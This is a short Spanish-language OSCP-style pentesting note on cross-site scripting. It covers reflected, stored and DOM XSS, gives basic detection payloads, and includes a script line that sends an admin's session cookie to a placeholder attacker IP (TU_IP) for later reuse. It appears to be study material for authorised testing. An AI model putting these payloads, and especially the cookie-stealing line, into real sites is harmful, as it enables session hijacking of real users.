El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
1.1 KiB
1.1 KiB
XSS (Cross-Site Scripting)
Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.
Tipos
Reflected → tu payload vuelve en la respuesta de ESA petición (?q=<script>...)
Stored → se guarda (comentario, perfil) y se dispara a quien lo vea (más potente)
DOM → el JS del cliente mete tu input en el DOM sin sanear
Detección y payloads
<script>alert(1)</script>
<img src=x onerror=alert(document.domain)>
"><svg onload=alert(1)>
Prueba primero un marcador inofensivo y mira si se renderiza o se escapa (en Burp Repeater e Intruder).
Para qué sirve en OSCP
- Robar la cookie de sesión de un admin (XSS stored en un panel que el admin revisa):
<script>new Image().src='http://TU_IP/c='+document.cookie</script>
La recibes en tu python3 -m http.server → la usas en Authentication attacks.
- A veces el panel admin tiene una función que escala a RCE / File upload bypass.
Relacionado: SSTI · Authentication attacks · OSCP MOC